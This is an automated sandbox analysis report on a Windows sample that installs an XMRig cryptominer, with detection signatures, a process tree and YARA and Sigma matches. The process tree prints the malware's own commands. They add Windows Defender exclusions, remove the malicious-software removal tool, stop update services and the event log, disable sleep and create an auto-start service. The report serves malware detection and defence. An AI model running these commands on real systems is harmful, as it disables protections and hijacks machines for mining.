Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip

Overview

General Information

Sample name:MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip
Analysis ID:1408951
MD5:3384ccc27194a142f68c7ea1f157e2af
SHA1:32644f4bf6678db76c9968fb048c8b3f78bb30ae
SHA256:b892d9e7e59c6e61d99f8aeb1521b57567b821e10036d825648aebb66e754763
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Snort IDS alert for network traffic
Yara detected Xmrig cryptocurrency miner
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64_ra
  • rundll32.exe (PID: 4508 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • svchost.exe (PID: 72 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Setup.exe (PID: 1036 cmdline: "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" MD5: DF65134B0B2B2CC03F07647794B274E5)
    • powershell.exe (PID: 1836 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" -Verb runAs MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Setup.exe (PID: 6476 cmdline: "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" MD5: DF65134B0B2B2CC03F07647794B274E5)
        • powershell.exe (PID: 6520 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 6708 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wusa.exe (PID: 6796 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
        • sc.exe (PID: 6724 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 6756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 6836 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 6844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 6888 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 6940 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 6948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 6992 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 7044 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 7052 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 7076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 7068 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 7108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 7100 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 3904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • dialer.exe (PID: 7144 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
          • winlogon.exe (PID: 584 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
          • lsass.exe (PID: 664 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
          • svchost.exe (PID: 972 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • dwm.exe (PID: 380 cmdline: dwm.exe MD5: 5C27608411832C5B39BA04E33D53536C)
        • sc.exe (PID: 4868 cmdline: C:\Windows\system32\sc.exe delete "SXJAJUSN" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 2652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 5388 cmdline: C:\Windows\system32\sc.exe create "SXJAJUSN" binpath= "C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 1552 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 1836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 1844 cmdline: C:\Windows\system32\sc.exe start "SXJAJUSN" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 1596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 1728 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 3992 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 3964 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5152 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 1448 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 1444 cmdline: C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6296 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 6424 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 3508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • jnxsifnrdetl.exe (PID: 4248 cmdline: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe MD5: DF65134B0B2B2CC03F07647794B274E5)
    • powershell.exe (PID: 6536 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6560 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 6756 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 6528 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6852 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6880 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6936 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6952 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6980 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6948 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7004 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7028 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 7112 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • svchost.exe (PID: 728 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 460 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1068 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1076 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1136 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1204 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1260 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1352 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1452 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1512 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1520 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1528 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1676 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1756 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1780 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1800 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1808 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1964 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2004 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1384 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1300 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1368 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2112 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2168 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • spoolsv.exe (PID: 2284 cmdline: C:\Windows\System32\spoolsv.exe MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F)
      • svchost.exe (PID: 2316 cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2440 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2508 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2516 cmdline: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2632 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2640 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2680 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2688 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2700 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • OfficeClickToRun.exe (PID: 2764 cmdline: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service MD5: 75F42872C0302D36A1E3BB5C7928FC02)
      • svchost.exe (PID: 2892 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2944 cmdline: C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 3000 cmdline: C:\Windows\System32\svchost.exe -k netsvcs MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 3416 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 3672 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s NcdAutoSetup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • sihost.exe (PID: 3800 cmdline: sihost.exe MD5: A21E7719D73D0322E2E7D61802CB8F80)
      • svchost.exe (PID: 3832 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 3884 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 4068 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 344 cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2372 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TabletInputService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • ctfmon.exe (PID: 4144 cmdline: ctfmon.exe MD5: B625C18E177D5BEB5A6F6432CCF46FB3)
      • dasHost.exe (PID: 4160 cmdline: dashost.exe {56d287c9-3fb8-41cd-a9e100d94de470c6} MD5: 2857A196985FC58A74C337B5E95B2174)
      • svchost.exe (PID: 4236 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 4292 cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • explorer.exe (PID: 4380 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • svchost.exe (PID: 4520 cmdline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • RuntimeBroker.exe (PID: 3372 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • RuntimeBroker.exe (PID: 5212 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • RuntimeBroker.exe (PID: 5620 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • dllhost.exe (PID: 6076 cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
    • dialer.exe (PID: 7120 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 6444 cmdline: dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
      • 0x37eb98:$a1: mining.set_target
      • 0x370e20:$a2: XMRIG_HOSTNAME
      • 0x373748:$a3: Usage: xmrig [OPTIONS]
      • 0x370df8:$a4: XMRIG_VERSION
      Process Memory Space: dialer.exe PID: 6444JoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        Process Memory Space: dialer.exe PID: 6444MacOS_Cryptominer_Xmrig_241780a1unknownunknown
        • 0x13574:$a1: mining.set_target
        • 0xfd1d:$a2: XMRIG_HOSTNAME
        • 0x10a95:$a3: Usage: xmrig [OPTIONS]
        • 0xfcfe:$a4: XMRIG_VERSION

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        81.2.dialer.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          81.2.dialer.exe.140000000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
          • 0x37ef98:$a1: mining.set_target
          • 0x371220:$a2: XMRIG_HOSTNAME
          • 0x373b48:$a3: Usage: xmrig [OPTIONS]
          • 0x3711f8:$a4: XMRIG_VERSION
          81.2.dialer.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
          • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
          81.2.dialer.exe.140000000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
          • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
          • 0x3cd180:$s3: \\.\WinRing0_
          • 0x376148:$s4: pool_wallet
          • 0x3705f0:$s5: cryptonight
          • 0x370600:$s5: cryptonight
          • 0x370610:$s5: cryptonight
          • 0x370620:$s5: cryptonight
          • 0x370638:$s5: cryptonight
          • 0x370648:$s5: cryptonight
          • 0x370658:$s5: cryptonight
          • 0x370670:$s5: cryptonight
          • 0x370680:$s5: cryptonight
          • 0x370698:$s5: cryptonight
          • 0x3706b0:$s5: cryptonight
          • 0x3706c0:$s5: cryptonight
          • 0x3706d0:$s5: cryptonight
          • 0x3706e0:$s5: cryptonight
          • 0x3706f8:$s5: cryptonight
          • 0x370710:$s5: cryptonight
          • 0x370720:$s5: cryptonight
          • 0x370730:$s5: cryptonight

          Sigma Signatures

          Change of critical system settings

          barindex
          Sigma detected: Disable power options
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe, ParentProcessId: 6476, ParentProcessName: Setup.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 7044, ProcessName: powercfg.exe

          System Summary

          barindex
          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
